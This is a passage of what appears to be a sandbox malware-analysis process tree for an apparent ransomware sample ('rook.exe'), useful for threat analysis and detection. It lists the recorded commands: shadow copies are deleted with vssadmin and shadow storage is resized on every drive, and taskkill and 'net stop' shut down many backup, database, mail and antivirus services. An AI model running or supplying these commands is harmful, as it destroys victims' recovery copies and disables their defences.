    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:22172
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:22544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:22632
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:11352
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:25288
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:25928
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:26036

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:25248
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:25320
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:26004
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5208
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:26660
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:26716
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:26724
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7508
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:27684
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:27740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:27796
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:27852
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:27908
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:27964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:2004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:9208
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:10108
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3804
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:10416
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:10648
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30344
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30408
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30560
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30448
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8840
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30616
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30472
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8976
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:30656
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:30968

C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:828
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2160
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3584
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3664
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Enterprise Client Service" /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
  2⤵
  PID:3892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Agent" /y
    3⤵
    PID:1528
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:3248
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Clean Service" /y
    3⤵
    PID:3412
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
  2⤵
  PID:3992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
  2⤵
  PID:4036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Health Service" /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
    3⤵
    PID:3536
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Client" /y
    3⤵
    PID:4032
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Message Router" /y
    3⤵
    PID:3724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
  2⤵
  PID:3972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
  2⤵
  PID:3556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
    3⤵
    PID:3520
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
  2⤵
  PID:3968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
    3⤵
    PID:3472
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
    3⤵
    PID:3704
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec System Recovery" /y
    3⤵
    PID:3636
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:3052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcronisAgent /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3520
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:3592
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Antivirus /y
  2⤵
  PID:3928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ARSM /y
  2⤵
  PID:3472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:3944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:3896
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:3052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:3864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:3712
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop bedbg /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop DCAgent /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPSecurityService /y
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:3864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPUpdateService /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:4008
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:3472
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EsgShKernel /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop FA_Scheduler /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:3968
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IISAdmin /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:3052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IMAP4Svc /y
  2⤵
  PID:3892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IMAP4Svc /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop macmnsvc /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:3520
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop masvc /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:3708
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBAMService /y
  2⤵
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:3944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBEndpointAgent /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeEngineService /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFramework /y
  2⤵
  PID:3928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:3636
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:3968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McShield /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McTaskManager /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:3444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfemms /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:3944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfevtp /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MMS /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:3892
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mozyprobackup /y
  2⤵
  PID:4004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:3972
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer100 /y
  2⤵
  PID:3248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer110 /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeES /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeIS /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:1548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMTA /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:3480
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSA /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
